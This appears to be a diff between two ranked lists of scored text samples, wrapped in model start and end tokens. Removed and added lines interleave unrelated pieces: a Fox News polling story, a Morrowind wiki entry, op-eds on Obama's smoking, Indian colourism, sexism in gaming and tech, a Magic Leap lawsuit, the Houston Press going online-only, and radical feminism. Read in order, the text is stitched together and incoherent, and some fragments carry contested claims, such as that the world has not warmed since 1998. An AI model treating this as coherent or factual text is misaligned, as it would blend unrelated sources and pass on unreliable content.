had been trapped in the Soul Cairn. -During the Obama presidency Fox News positioned itself as a voice of the opposition. Fox's most popular shows, like "The O'Reilly Factor," reinforced these sentiments. +Contents show] -If Clinton is elected president, Fox's audience will expect more of the same. +Interactions Edit -Fox News says it reaches many independents and some Democrats. But several surveys, including Suffolk's, shows that Fox's base is passionately pro-Republican, aligning with GOP positions and GOP candidates. +He was transferred by ship alongside the Nerevarine from the Imperial City prison to Morrowind for release in 3E 427. When the Nerevarine awakens, Jiub tells them that they were asleep for a long time, and nothing would wake them up, finishing the coversation by mentioning that the ship has reached Morrowind. After this short, initial encounter, Jiub is never encountered by the Nerevarine again. He is the very first character the Nerevarine encounters in Morrowind. -Suffolk's polls ask many of the same questions that other pollsters ask during presidential election years -- but add a layer of questions about media consumption on top. +Quotes Edit -The Suffolk pollsters ask: "What TV news or commentary source do you trust the most?" +Quote Audio "Stand up. There you go. You were dreaming. What's your name?" "Well, not even last night's storm could wake you. I've heard them say we've reached Morrowind, I'm sure they'll let us go." "Quiet. Here comes the guard." "You better do what they say." -In the most recent poll, 270 of the 1,000 respondents said Fox -- the single highest result of any of the networks named in the poll. This reflects Fox's tight grip on conservatives. More than +Trivia Edit<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 87; Score = 266240.0 -<|begin_of_text|>President's smoking more likely to cause daughter's health problem than climate change. +Rank = 85; Score = 124928.0 +<|begin_of_text|>Giriraj Singh’s remarks about “white-skinned” Sonia Gandhi shocked a lot of people this week. Tasteless though the comment was, it did bring out a prevalent Indian attitude about the colour of one’s skin. Indeed, one thing that baffles me about India is our love for fair skin. Not unlike many African and Asian countries, Indians too obsess about having a lighter skin colour, consider people with lighter skin as more beautiful and, in the worst case, even ascribe a higher status to them. From the multi-million-dollar fairness products industry to the fact that all children in our baby product ads are fair, one no longer needs to debate that Indians love lighter skin. We do, and that might have just been one of those many Indian quirks had it not had harmful effects on our society. Indians are not fair-skinned on an average, and thus millions have a complex about their skin colour. -President Obama and daughter Malia last month. (Photo11: Butch Dill, AP) +Women, in particular, bear the worst of it. I remember my darker-toned cousins being told to not drink tea while growing up (because tea makes you black, as per Indian home science, never mind the English never turned dark despite fighting wars for tea), or to study harder because they were dark and hence it would not be easy to marry them off. Apart from judgments about looks, there is something more onerous when it comes to skin colour and Indians. Dark-skinned people get fewer opportunities in India. This is not racism, but is sometimes referred to as colourism or pigmentocracy. Fair-skinned people are more likely to be hired in certain jobs (when was the last time you saw a dark-skinned flight attendant on an Indian airline?). + +We must address this. Not merely in lip service or by raising your voice with catchy slogans for Facebook, but by honestly seeing what is the root cause driving all this. + +The key reason why this happens is the associations related to colours, and also to people of a particular colour. + +First, is it just the intrinsic colours? White. Black. What do these colours signify to you? White is often used in the context of clarity, purity and cleanliness. Black is used to describe the opposite. White is clean, black is dirt. Is some of this carried through when we refer to the same colours in the context of our skin? -President Obama blames global warming for his daughter's asthma. Today that's politically useful spin, but the science says something different. If you're looking for a culprit, it just might be Malia's dad. +Of course, not everything black is seen as unaesthetic. Thick and shiny black hair is associated with youth, health and beauty. Images of dark brown chocolate, associated with deliciousness, can make one’s mouth water +================================================================================ +Rank = 86; Score = 124416.0 +<|begin_of_text|>Women are discriminated against in all areas of gaming. What can we do about it? -In an interview Wednesday, in support of a new White House climate change awareness campaign, the president noted that his 16-year-old daughter had asthma when she was 4. He said that as a father, when your child says she has trouble breathing, "the fright you feel is terrible." Fortunately, doctors were able to treat Malia's condition quickly. +WARNING: this article involves feminism. Those offended by the idea of gender equality should STEP AWAY FROM THEIR COMPUTERS NOW and get back inside their caves. Not a misogynist? Then hey buddy, sit back and relax. I’d offer you a cup of tea but you’re miles away (and I don’t have any tea). -The president connected his daughter's malady to global climate change. In a discussion Tuesday, he said "all of our families are going to be vulnerable" to global warming-induced health risks because "you can't cordon yourself off from air or from climate." +Sexism permeates our society, that’s a given, but you might not have realised just how much it occurs in gaming. There are three levels at which it exists: at an industry level, in games themselves, and from within gamers. It’s vital that we are aware of these problems but, more importantly, we have to do our best in tackling them. To do this, we must look at each problem in turn. -A White House fact sheet connected the dots, saying that asthma rates have more than doubled in the past 30 years, and that "climate change is putting these individuals and many other vulnerable populations at greater risk of landing in the hospital" like Malia. +First: sexism in the industry. There is evidence that suggests women who work in gaming are under-represented and suffer some of the worst gender-based harassment. Female gamers make up 45% of the gaming population; yet male game designers make up 89% of the industry and earn 23.6% more than their female counterparts. What a kick in the balls vagina. There have also been many high-profile incidents of women being harassed by men in the workplace. One of the most recent stories involved Josh Mattingly, CEO and founder of Indiestatik, publicly apologising and “stepping down” after sending a female game developer inappropriate and unprovoked sexual messages on Facebook. -The good news is that there is less reason for alarm than the White House suggests. The Environmental Protection Agency cautions that "outdoor air pollution and pollen may also worsen chronic respiratory diseases, such as asthma." Yet the EPA also reports that our air quality has substantially improved; aggregate emissions of common pollutants have decreased 62% between 1980 and 2013. It is unlikely that cleaner air is causing the increase in asthma. +People have claimed that women should just stand up for themselves and that speaking up against those that harass them should be enough to stop the problem, but there is not always a clear cut solution. The #thatwoman hashtag shows that in speaking up, women are likely to be ostracised and have it limit their future career. Perhaps the risk would be worth the overall benefits, but it is understandable why women in gaming don’t always feel free to confront those that may oppress or belittle them. It would be like Yoshi trying to stand up to Mario – he’s just going to drop Yoshi mid-jump and carry on like nothing happened anyway. -Whether there is a link between asthma and global warming, Malia herself hasn't really experienced much. The high school junior was born in 1998, when temperatures spiked. By some measurements, the world hasn't warmed significantly since then. +Similarly, the #1reasonwhy hashtag asked women to speak out about why they don’t feel comfortable in the gaming industry. The results included stories of groping and being constantly mistaken for assistants and receptionists. -Which brings us back to her father and his Marlboros. The president, who quit smoking years ago, has long kept his tobacco use out of doors. That's a common-sense tactic for folks who have trouble quitting. But sometimes, science can show that common sense has less sense than you think. +Jade Raymond, Producer of Assassin’s Creed, was accused of using her looks to sell the game -Research funded by the National Institutes of Health has shown that smoking outside doesn't totally protect children from secondhand smoke. Even when smoking is done outside, nicotine in infants' hair is five times higher for babies with outside smoking parents than non-smoking parents. Smoking-related chemicals in infants' urine is seven times +What is there to be done about +================================================================================ +Rank = 87; Score = 123904.0 +<|begin_of_text|>Good food, good eating, is all about blood and organs, cruelty and decay. It’s about sodium-loaded pork fat, stinky triple-cream cheeses, the tender thymus glands and distended livers of young animals. It’s about danger—risking the dark, bacterial forces of beef, chicken, cheese, and shellfish. Your first two hundred and seven Wellfleet oysters may transport you to a state of rapture, but your two hundred and eighth may send you to bed with the sweats, chills, and vomits. Gastronomy is the science of pain. Professional cooks belong to a secret society whose ancient rituals derive from the principles of stoicism in the face of humiliation, injury, fatigue, and the threat of illness. The members of a tight, well-greased kitchen staff are a lot like a submarine crew. Confined for most of their waking hours in hot, airless spaces, and ruled by despotic leaders, they often acquire the characteristics of the poor saps who were press-ganged into the royal navies of Napoleonic times—superstition, a contempt for outsiders, and a loyalty to no flag but their own. A good deal has changed since Orwell’s memoir of the months he spent as a dishwasher in “Down and Out in Paris and London.” Gas ranges and exhaust fans have gone a long way toward increasing the life span of the working culinarian. Nowadays, most aspiring cooks come into the business because they want to: they have chosen this life, studied for it. Today’s top chefs are like star athletes. They bounce from kitchen to kitchen—free agents in search of more money, more acclaim. I’ve been a chef in New York for more than ten years, and, for the decade before that, a dishwasher, a prep drone, a line cook, and a sous-chef. I came into the business when cooks still smoked on the line and wore headbands. A few years ago, I wasn’t surprised to hear rumors of a study of the nation’s prison population which reportedly found that the leading civilian occupation among inmates before they were put behind bars was “cook.” As most of us in the restaurant business know, there is a powerful strain of criminality in the industry, ranging from the dope-dealing busboy with beeper and cell phone to the restaurant owner who has two sets of accounting books. In fact, it was the unsavory side of professional cooking that attracted me to it in the first place. In ================================================================================ -Rank = 88; Score = 266240.0 -<|begin_of_text|>Shoot lasers at the moon, solve Earth’s energy crisis. Boom. Done. Next global problem please, we’re on a roll. This is the statement I wish Japan’s Shimizu Corp. had released about their new energy plan, but alas they’ve simply just announced the details of a scheme to harvest solar power from panels on the moon. But, what a plan it is. +Rank = 88; Score = 122368.0 +<|begin_of_text|>We’ve all heard about the gender gap in tech. Women simply aren’t thriving in one of the most promising fields in the United States — and not for lack of talent. And here’s the truth: It’s not solely a problem for women. It’s a problem for men, too. In just five years, there will be a million unfilled computer science–related jobs in the United States, which according to our calculations could amount to a $500 billion opportunity cost. Tech companies are producing jobs three times faster than the U.S. is producing computer scientists. There are incredible opportunities here. We need women to help fill these jobs, and we need them now. -Robots will build a belt of solar panels to encircle the moon. The panels will gather up energy from the sun, convert it to electricity and then channel the electricity by cable around to the Earth-facing side of the moon. From there the power will be zapped to large receivers on Earth’s surface using lasers. Why did it take so long for someone to propose this? +The reasons why women and people of color are not pursuing computer science jobs are complicated. I’ve thought a lot about this over the past 16 months, as I’ve directed my documentary on the subject, Code: Debugging the Gender Gap, and I believe there are four main reasons women don’t thrive in tech. Here they are: -The Luna Ring plan, which was introduced in Tokyo, is only the most recent in a long line of envelope pushing, seemingly kooky ideas to come from Shimizu Corp. But, the company seems serious about their plan proposing that the Luna Ring could begin construction by the year 2035. +1. Culture -Judging from the amount of technology needed (a working robot colony on the moon?) and the financial drain attempting such a project would entail, we won’t be holding our breath for this one. Although, because the moon already drives ocean tides the idea of finding even more uses for the moon isn’t completely crazy. Shimizu’s plan might seem like something straight out of a comedy routine, but its not like they’re trying to blow up the moon or anything. Right? +First and foremost, this is a culture problem. The stereotype of a software engineer is a 25-year-old, hoodie-clad dude who wears glasses, is antisocial, and loves to hack strings of code in the basement of his parents’ home, eating stale pizza and drinking Red Bull until 3 or 4am. As with all stereotypes, there’s some truth here, and it’s not the most aspirational image for a young woman. Old movies like War Games contributed to the stereotype, while the image of the male geek genius is perpetuated in modern pop culture with television shows such as HBO’s Silicon Valley and The Big Bang Theory. -(via CNN Go)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 89; Score = 266240.0 -<|begin_of_text|>Public officials and the relatively financially secure have long been guilty of turning the homeless and the poor into scapegoats — and making examples of the people perhaps in most need of compassion and help from their neighbors. It happens everywhere in America. And it's also become all too common in most Western countries around the world. +2. Few role models -Just last week in Florida, the Ft. Lauderdale City Commission made it a crime for anyone to sleep publicly downtown, or for panhandlers to approach cars at "busy intersections." According to the Sun Sentinel, the infractions are punishable by $500 and 60 days in jail. That's money and time many people just can't afford to spare. +Which leads me to another huge reason we have a gender imbalance: Tech is basically devoid of female role models. The old adage “You cannot be what you cannot see” is true here. Young girls and people of color have very few modern-day role models in tech. Megan Smith is the Chief Technology Officer of the United States, but she’s hardly a household name. We need more modern-day female role models, many more. -And earlier this year in London, one luxury apartment building installed so-called "anti-homeless spikes" near entranceways to keep the homeless from sleeping in those spaces. +3. Poor pipeline -Anti homeless floor studs. So much for community spirit :( pic.twitter.com/Yz8VF7Ryid +At most universities, few women make it past the 101, entry-level computer science class that should welcome all students, regardless of their prior knowledge of the subject. Instead, women entering this first-year class too often suffer from negative ambient belonging. From the first day there, they perceive that the men in the class know much more about programming than they do. And they are +================================================================================ +Rank = 89; Score = 121856.0 +<|begin_of_text|>Print is dead. Long live digital. Long live the Houston Press. In dot com form. -This is no way to treat people who are less fortunate. But more than that, it betrays a serious lack of empathy toward those who might be in need of shelter. +As of today and going forward, there will be no more print copies of the Houston Press. We’ll be online-only at houstonpress.com, a business decision brought about by declining advertising revenues seen throughout the print newspaper industry and more specifically for us, the mini recession caused by the downturn in the oil and gas industry that did nothing good for the Houston economy. -More than 600,000 people in America are homeless. Ignorance and the perpetuation of a number of stereotypes has led to the creation of rigid categories of the haves and have nots. But it doesn't have to be that way. Much can be done to help ensure virtually no American has to forage for food or search/create their own shelter. Everyone can start by consciously challenging the deeply ingrained myths and questions people think about the homeless. +Continue Reading -1. Why can't you get a job like everyone else? +And then, of course, there was Hurricane Harvey. That was the topper. The massive flooding destruction it caused appeared to directly target restaurants and the arts community – some of our biggest advertisers – who faced with declining revenues of their own found they had other, more pressing expenses to consider. -For a job interview at a bank or even a burger joint, candidates need clean clothes, shoes in good condition, a shower and hygienic products so that they can appear as their best selves. Resumes, transportation and a stable telephone number are also needed. +Despite all the millions of people who read us each month, or all the journalism awards we’ve won, or the successful public events our marketing department has presented, the fact is, we haven’t been making enough money to sustain ourselves in print and our parent company Voice Media Group decided it could no longer afford to be our enabler. -Even if they have marketable skills, most homeless and poor people are just trying to survive at the most basic level of Maslow's hierarchy of needs, a time-consuming search for food, water and shelter. +A new streamlined Houston Press will emerge starting next week, still presenting the cutting edge journalism that readers aren’t likely to get elsewhere, still questioning the status quo while highlighting what we think is great about Houston. The difference will be that a sole editor will be working with freelancers to produce editorial copy, rather than having a staff on hand. -And in an environment where jobs requiring relatively low amounts of skill aren't paid living wages — especially within the retail and fast-food industries — even homeless people who are able to secure an interview are likely to end up part of the "working poor," as chronicled by Barbara Ehrenreich in Nickled and Dimed. +It’s not like we haven’t changed before. When I returned to Houston almost 20 years ago to take on the editor-in-chief position everything was directed toward unhurried fact-finding – in fact that was stressed in our recruitment ads. For someone coming from the daily newspaper world as I was, it took considerable adjustment to get used to the fact that every event didn’t require an immediate response. The workload was just as intense as now, but different. At our height we were running two in-depth magazine-style stories in every issue. -2. How do you not have housing by now if you've been panhandling? +When we eventually moved to an online component there was a huge adjustment as well. Suddenly we were back in the game – some of the staff for the first time in their careers – of responding quickly, of answering the bell, collecting thoughts rapidly while still writing clearly and cleverly. -The idea that panhandlers +As it turned out in most cases the online demands helped everyone become better, sharper writers. Readers engaged with us in ways they hadn’t in the past. Posts online led to tips that took us to larger stories. Photographs looked better online than they could ever look on newsprint. Cover ================================================================================ -Rank = 90; Score = 264192.0 -<|begin_of_text|>Cementing its reputation as a slow-motion corporate car-crash, made-up technology specialist Magic Leap has been sued for sex discrimination by the woman it hired to tackle sex discrimination. - -Tannen Campbell filed in a Florida court [PDF] this week accusing the virtual-reality startup of maintaining a "hostile environment" and a "macho bullying atmosphere." She claimed she was fired after she challenged CEO Rony Abovitz on the "depths of misogyny in Magic Leap's culture." +Rank = 90; Score = 121344.0 +<|begin_of_text|>Highly educated people are less likely to be poor than less-educated people. That's true today, it was true decades ago, and it's not especially surprising. What is a bit surprising is what's shown in this chart from Melissa Boteach and Shawn Fremstad of the Center for American Progress — poor Americans are much better-educated today than they were a generation ago: -As VP of strategic marketing and brand identity, Campbell says part of her job was to help the tech company with what it called its "pink/blue problem" (quick hint: not calling gender inequality a "pink/blue problem" is probably a good first step). +There are a lot of problems with the official poverty metric, so don't sweat the details of this too much. The point, however, is that you can't count on improving educational outcomes alone to cure poverty. We've made dramatically more progress in improving high school graduation rates and college attendance rates than we've made in raising the market incomes of workers at the bottom of the income pyramid. And the 2013 data in part shows that recessions continue to be punishing, poverty-inducing experiences for Americans with all kinds of educational credentials. -The pinkness was also literally an issue: the all-male tech team (who were matched by the all-male advertising and executive teams) were asked to consider how to make their augmented reality headset more female friendly and, according to Campbell, the only solution they arrived at was to produce a version in pink. +WATCH: 'We know how to end poverty, so why don't we?'<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 91; Score = 120832.0 +<|begin_of_text|>Hi! Thanks for reaching out. I think it’s always useful to educate yourself on subjects you don’t know a lot about, so props to you for reading into new materials. I’ve taken screenshots of each question, so hopefully I can answer thoroughly! After a quick read through, though, it does seem like you’re confusing a portion of radical feminism with liberal feminism, so I’ll be certain to highlight those differences as we go. Okay! -The lawsuit then offers a wide range of accusations of sexism, stemming from tetchy to highly personal to jaw-dropping. For starters, she took issue with the fact that the Florida company's jobs page was titled "Wizards wanted," seemingly shutting out women. +1. -She then goes on to slam the CFO for being "the kind of man who sits a little too close to women," and the VP of IT for being loud and making "misogynistic comments." She even turns on the company's most senior woman, its chief business officer, accusing her of being "the perfect Magic Leap female employee: she went to Harvard, never disagrees with Abovitz and always does Abovitz's bidding." +Firstly, radical feminism isn’t a new wave so much as a return to the values of second wave feminism, which is being championed by a new generation! Our collective goal is the liberation of women from historical and societal structures that bind them, working with an understanding that women suffer from sexism, or sex- based oppression. While we may have differing ideas on how to accomplish this goal, or the best route to take, you’ll universally see womens liberation on the forefront of our messages! Radfems agree that gender is a social class we ascribe to biology, that gender is the expectations and socializations we apply to our own innate biology! I.e. women are submissive, caring, like pink, will be mothers, will wear makeup…and men are strong, and unemotional, like blue, will be providers, will cut their hair short. Radical feminists say “we shouldn’t live in these boxes! Our biology doesn’t determine our interests, our abilities, who we love, or what we want to do with our life!” Radical feminists want a dismantling of gender roles, specifically because they are used to subjugate women. -Presentation +2. -Before you start writing off Campbell, however, she goes into some depth on the practices and approaches she recommended Magic Leap adopt in order to bring about a more balanced workplace, and they are good. Although some are perhaps more of a wish list – such as paying for a recruiter to help the partners of female hires relocated to Florida to find jobs as well to help ease the move to the company, and paying for female tech leaders including Sheryl Sandberg and Meg Whitman to attend company meetings as speakers. +Radical feminism is for women, and liberating women, and it does so unapologetically. We understand that our feminism focuses on sex- based oppression - our sex being female. No radical feminists are trans exclusive. Trans men are as affected by female bodily autonomy (deserving access to female medical care, cervical screenings, breast exams, abortions, birth control, menstruation) as any woman. They deserve respect in the unique challenges they face in the cross section of transphobia and misogyny they face in the world. They deserve spaces free of male violence. The policies we pursue reflect that. People use the term “trans exclusive” because trans women do not play a role in our activism, as they are male-bodied and therefore do not experience sex-based oppression. -She developed a presentation for CEO Abovitz but her scheduled meeting to go over it was cancelled no fewer than six times. It took her eight months to get the meeting, and then he terminated the meeting about halfway through. Efforts +SWERF is interesting, isn’t it? I am not anti-sex workers at all. I am against the sex work industry. The term ================================================================================ -Rank = 91; Score = 262144.0 -<|begin_of_text|>Women in headscarves and men in tatty clothes puff on a glass pipe as smoke swirls around their faces. The pictures published by Iranian media and blogs in recent months are a sign of a new drug epidemic: shishe, or methamphetamine. +Rank = 92; Score = 120832.0 +<|begin_of_text|>SOME women would prefer a world where men don’t exist. Just picture it. No hogging the remote. No beard clippings in the sink. -Shishe means “glass” in Farsi, a reference to the appearance of the drug in some of its purest forms. +After all, it works for other species. Komodo dragons can reproduce without sex with a male partner. So can whiptail lizards, hammerhead sharks and parasitic wasps. And they seem happy enough. -In less than a decade, methamphetamine use has skyrocketed in Iran to the point where now about 345,000 Iranians are considered addicts, according to official statistics. +But researchers say there’s a very important evolutionary reason men exist and without them a hypothetical asexual all-female human race would likely become extinct. -Seizures of methamphetamine soared 128 percent between 2008 and 2012, topping all other countries in the region, according to figures compiled by the United Nations Office on Drugs and Crime. Last year alone, the government of Iran confiscated 3.6 tons of shishe. +Professor Matt Gage from the University of East Anglia asked the question seven years ago: “Why 